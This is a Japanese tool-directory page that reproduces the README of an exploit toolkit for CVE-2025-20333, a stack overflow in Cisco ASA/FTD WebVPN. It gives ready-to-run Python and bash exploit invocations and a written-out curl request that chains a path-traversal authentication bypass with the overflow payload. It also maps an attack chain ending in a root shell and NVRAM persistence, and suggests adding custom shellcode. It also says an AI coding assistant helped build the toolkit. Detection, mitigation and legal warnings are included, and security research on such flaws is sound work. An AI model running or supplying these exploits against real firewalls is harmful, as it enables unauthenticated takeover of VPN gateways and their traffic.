Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2025-20333 — CVE-2025-20333(Cisco ASA/FTD WebVPN の重大なスタックバッファオーバーフロー)向けの完全な調査・悪用ツールキット。詳細なバイナリ解析、Python および bash による PoC エクスプロイト、悪用ガイドを含みます。 | Kitploit
ツール/GitHubGitHub/cobbbex/cve-2025-20333
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育レッドチーミングバイナリエクスプロイト
GitHubcobbbex/cve-2025-20333

cve-2025-20333

CVE-2025-20333(Cisco ASA/FTD WebVPN の重大なスタックバッファオーバーフロー)向けの完全な調査・悪用ツールキット。詳細なバイナリ解析、Python および bash による PoC エクスプロイト、悪用ガイドを含みます。

リポジトリを見る
271ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-20333 - 完全な調査・悪用ツールキット

概要

このディレクトリには、Cisco ASA/FTD WebVPN サーバーにおける重大なスタックバッファオーバーフロー脆弱性である CVE-2025-20333 に関する包括的な調査、分析、および概念実証コードが含まれています。

ステータス: ⚠️ 実環境で活発に悪用中(ArcaneDoor キャンペーン)
CVSS スコア: 9.8 Critical
認証: 不要(CVE-2025-20362 により回避)
影響: root としてのリモートコード実行


内容

📚 ドキュメント

CVE-2025-20333-RESEARCH-NOTES.md(20 KB)

完全なリバースエンジニアリング調査

  • 脆弱性の背景とウェブインテリジェンス
  • バイナリ解析(ASA 9.12.4.x lina プロセス)
  • リクエスト取り込み層の監査
  • Lua API バインディングの解析
  • 🎯 オーバーフローの発見(body_lexer.re2c、FUN_0302e690)
  • 攻撃チェーンの内訳
  • コードパターンによる根本原因分析
  • ツール・アドレス参照表

主要な発見:

body_lexer.re2c 内の固定 16 バイトバッファ(local_58[16])
URL デコードループに境界チェックが無い
iVar11 < 16 を確認せずに local_58[iVar11] へ書き込み
8 組の 16 進ペア後: オーバーフロー → スタック破壊 → RCE

EXPLOITATION-GUIDE.md(12 KB)

実践的な悪用マニュアル

  • 脆弱性の仕組みの解説
  • 完全な攻撃チェーン(CVE-2025-20362 バイパス + オーバーフロー)
  • ステップバイステップの悪用手順
  • ペイロード作成テクニック
  • ネットワークベースの検出方法
  • ホストベースの検出とログ分析
  • 緩和策
  • パッチ適用済みバージョンとアップグレードパス
  • 法的・倫理的考慮事項

🔧 概念実証エクスプロイト

cve-2025-20333-poc.py(15 KB)

フル機能の Python エクスプロイト

機能:

  • 自動ペイロード生成
  • CVE-2025-20362 パストラバーサル統合
  • ROP ガジェットチェーン構築
  • SSL/TLS サポート
  • 設定可能なタイムアウト
  • 詳細な進捗レポート

使用方法:

# 脆弱性の詳細を表示
python3 cve-2025-20333-poc.py --details

# ターゲットを悪用
python3 cve-2025-20333-poc.py 192.168.1.100 443

# カスタム設定
python3 cve-2025-20333-poc.py firewall.example.com 8443 -t 30

cve-2025-20333-poc.sh(8.5 KB)

軽量な bash エクスプロイト

機能:

  • Python 依存なし
  • curl または netcat を使用
  • 最小限のリソース消費
  • 教育的なコメント
  • 明確なステータス出力

使用方法:

# 詳細を表示
./cve-2025-20333-poc.sh --details

# 悪用
./cve-2025-20333-poc.sh 192.168.1.100 443 10

# curl による手動実行
curl -X POST https://target/+CSCOU+/../+CSCOE+/files/file_list.json \
  -d "name=%2f%2f%2f%2f%2f%2f%2f%2f%2f" --insecure

脆弱性の概要

クイックファクト

プロパティ値
CVE IDCVE-2025-20333
タイプスタックバッファオーバーフロー(CWE-120)
コンポーネントbody_lexer.re2c(FUN_0302e690)
影響を受けるバージョンASA 9.16–9.23、FTD 7.0–7.7
CVSS v3.19.8(Critical)
認証不要(CVE-2025-20362 経由)
ユーザー操作なし
影響root としての RCE、システム完全侵害
ステータス活発に悪用中(2025年5月以降)
責任ある開示Cisco がパッチ適用済み、アドバイザリ公開済み

根本原因

// body_lexer.re2c - URL デコードループ
byte local_58[16];  // ← 固定 16 バイトバッファ

while (parsing_request_body) {
    byte input = *data++;
    
    if (input == '%') {
        hex_decode_mode = true;
        hex_index = 0;
    }
    
    if (hex_decode_mode) {
        local_58[hex_index] = input;  // ← 境界チェックなし!
        hex_index++;
        
        if (hex_index == 2) {
            byte decoded = hex_pair_to_byte(local_58[0], local_58[1]);
            hex_decode_mode = false;
        }
    }
}

オーバーフロートリガー: POST ボディ内の 9 個以上の連続する %XX シーケンス

攻撃チェーン

1. 攻撃者(認証不要)
   ↓
2. /+CSCOU+/../+CSCOE+/files/file_list.json への HTTP POST
   ├─ CVE-2025-20362: パストラバーサルで認証チェックを回避
   └─ files_retr.lua エンドポイントに到達(auth_flag = 0)
   ↓
3. POST ボディ: name=%2f%2f%2f%2f%2f%2f%2f%2f%2f
   (9 個以上の URL エンコードペア)
   ↓
4. body_lexer.re2c が POST ボディを処理
   ├─ 16 進ペアを local_58[16] に蓄積
   └─ 8 ペア後: オーバーフロー!
   ↓
5. スタック破壊
   ├─ local_48、local_40 を上書き
   ├─ 保存された RBP を上書き
   └─ 保存された RIP(リターンアドレス)を上書き
   ↓
6. 制御フローハイジャック
   ├─ RIP が ROP ガジェットを指す
   ├─ ROP チェーンが execve() をセットアップ
   └─ execve("/bin/sh", NULL, NULL)
   ↓
7. root としての RCE(lina プロセスは root で実行)
   ├─ VPN サーバー完全侵害
   ├─ すべての VPN トラフィックへのアクセス
   └─ NVRAM 改変による永続化

調査プロセス

フェーズ 1: バイナリ解析 ✅

  • Ghidra で lina バイナリをオープン
  • WebVPN リクエストアーキテクチャをマッピング(HTTP パーサー、URL ルーター、13 のエンドポイントフック)
  • リクエスト取り込み層を監査(すべて clString/固定サイズ割り当てで安全)
  • Lua API バインディングを調査(すべて安全)

フェーズ 2: ウェブインテリジェンス ✅

  • CVE-2025-20333 の技術詳細を検索
  • Rapid7、Zscaler、Horizon3、Tenable の分析を発見
  • 攻撃チェーンが /+CSCOU+/../+CSCOE+/files/file_list.json を使用することを確認
  • 根本原因を特定: Lua エンドポイントにおけるヒープベース(ウェブ情報源)/ スタックベース(本バイナリ)のオーバーフロー

フェーズ 3: ターゲットリバースエンジニアリング ✅

  • body_lexer.re2c(FUN_0302e690)を逆コンパイル
  • 発見: 境界チェックのない固定 16 バイトバッファ local_58[16]
  • オーバーフローパスを確認: URL デコードループ → 境界なし書き込み
  • 到達可能性を検証: files_retr.lua → body_lexer → スタックオーバーフロー

フェーズ 4: エクスプロイト開発 ✅

  • ROP チェーン対応の Python PoC を作成
  • 最小環境向けの bash PoC を作成
  • ペイロード構造と作成テクニックを文書化
  • 検出・緩和ガイダンスを含める

使用手順

許可を得たペネトレーションテスト向け

  1. 許可の確認

    • テストの書面による許可を取得
    • ターゲットシステムの詳細を確認(IP、ポート、バージョン)
    • スコープとタイムラインを文書化
  2. エクスプロイトの実行

    # クイックチェック: ターゲットはエクスプロイト試行に応答するか?
    python3 cve-2025-20333-poc.py <target_ip>
    
    # または bash 版:
    ./cve-2025-20333-poc.sh <target_ip>
    
  3. 悪用の検証

    • シェルアクセス / リバースシェル接続を確認
    • クラッシュや異常のシステムログを調査
    • 変更されたファイルをスキャン(NVRAM、永続バックドア)
  4. 調査結果の文書化

    • ターゲットのバージョン、パッチレベルを記録
    • 悪用の成功/失敗を文書化
    • 遭遇した防御策を記録
    • 是正推奨事項とともにクライアントに報告

セキュリティ研究向け

  1. 調査ノートを読む

    • CVE-2025-20333-RESEARCH-NOTES.md を学習
    • バイナリアーキテクチャとオーバーフローメカニズムを理解
  2. PoC を研究

    • ROP ガジェット構築の Python PoC をレビュー
    • 最小エクスプロイトの bash PoC をレビュー
    • ペイロードエンコーディングを理解
  3. 適応と拡張

    • カスタムシェルコードを追加
    • 異なる悪用テクニックを実装
    • パッチ適用済み vs 脆弱なバージョンでテスト

重要な警告

⚠️ 法的通知

このツールキットは 許可を得たセキュリティテスト専用 に提供されています。

  • 明示的な書面による許可なしにシステムに対して 使用しないでください
  • 悪意のある目的(データ窃取、サービス妨害、ランサムウェア)で 使用しないでください
  • 不正アクセスは コンピュータ詐欺及び不正使用防止法(米国) および世界各国の同様の法律に違反します
  • 罰則には刑事訴追、罰金、禁固刑が含まれます

✅ 許可された使用:

  • 書面による承認を得たペネトレーションテスト
  • 脆弱性研究における概念実証
  • 内部セキュリティテスト
  • CTF コンペティション
  • 学術研究

❌ 禁止された使用:

  • 許可のないシステムへの攻撃
  • ランサムウェアの展開
  • データ窃取または恐喝
  • サービス妨害
  • 侵害されたネットワーク内での横移動

ファイル一覧

cve-2025-20333/
├── README.md                              (本ファイル)
├── CVE-2025-20333-RESEARCH-NOTES.md      (20 KB、包括的な調査)
├── EXPLOITATION-GUIDE.md                 (12 KB、実践ガイド)
├── cve-2025-20333-poc.py                 (15 KB、Python PoC)
└── cve-2025-20333-poc.sh                 (8.5 KB、bash PoC)

ドキュメント合計: 約 65 KB
調査深度: 50 以上の Ghidra 関数を監査
検証済みの発見: body_lexer.re2c のバッファオーバーフローを確認


クイックリファレンス

脆弱性クイックテスト

# ターゲットが悪用に対して脆弱かテスト
curl -X POST https://<target>/+CSCOU+/../+CSCOE+/files/file_list.json \
  -d "name=%2f%2f%2f%2f%2f%2f%2f%2f%2f" \
  --insecure \
  -i

# ターゲットが応答した場合(200、500、クラッシュ)、脆弱な可能性あり
# ターゲットがブロック/リダイレクトした場合、パッチ適用済みの可能性あり

バージョンチェック

# 脆弱なバージョン:
# - Cisco ASA 9.16 から 9.23
# - Cisco FTD 7.0 から 7.7

# SSH/コンソールで ASA バージョンを確認:
show version

# パッチ適用済みバージョン:
# - ASA 9.16.4.51、9.18.4.31、9.20.4.49、9.22.4.9、9.24.1+
# - FTD 7.0.x、7.1.x、7.2.x(パッチ適用済み)

緩和チェックリスト

  • ASA/FTD バージョンを確認
  • 利用可能なパッチを確認
  • 脆弱な場合はパッチ適用済みバージョンにアップグレード
  • WebVPN アクセスを IP アドレスで制限
  • ロギングとモニタリングを有効化
  • CVE-2025-20362 パストラバーサル試行を監視
  • DoS パターン(lina クラッシュ)を監視
  • WebVPN ポートにファイアウォール保護を有効化

参考情報

  • Cisco セキュリティアドバイザリ: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-webvpn-z5xP8EUB
  • Rapid7 分析: https://www.rapid7.com/blog/post/etr-cve-2025-20333-cve-2025-20362-cve-2025-20363-multiple-critical-vulnerabilities-affecting-cisco-products/
  • Zscaler ThreatLabz: https://www.zscaler.com/blogs/security-research/cisco-firewall-and-vpn-zero-day-attacks-cve-2025-20333-and-cve-2025-20362
  • Tenable FAQ: https://www.tenable.com/blog/cve-2025-20333-cve-2025-20362-faq-cisco-asa-ftd-zero-days-uat4356

免責事項

このツールキットは、教育および許可を得たテスト目的のみで AS-IS で提供されます。

  • 自己責任で使用してください
  • 誤用に対する保証や責任はありません
  • 不正アクセスは違法です
  • 調査結果は Cisco および影響を受ける組織に責任を持って報告してください
  • お住まいの国のサイバーセキュリティ法に従ってください


謝辞

このプロジェクトは、Anthropic の AI 搭載コーディングアシスタントである Claude Code の支援を受けて開発されました。


作成日: 2026-08-23
調査期間: 2026-08-22 から 2026-08-23
ステータス: 完了・文書化済み
分類: 教育用 / 許可を得たテスト専用

ツールをダウンロード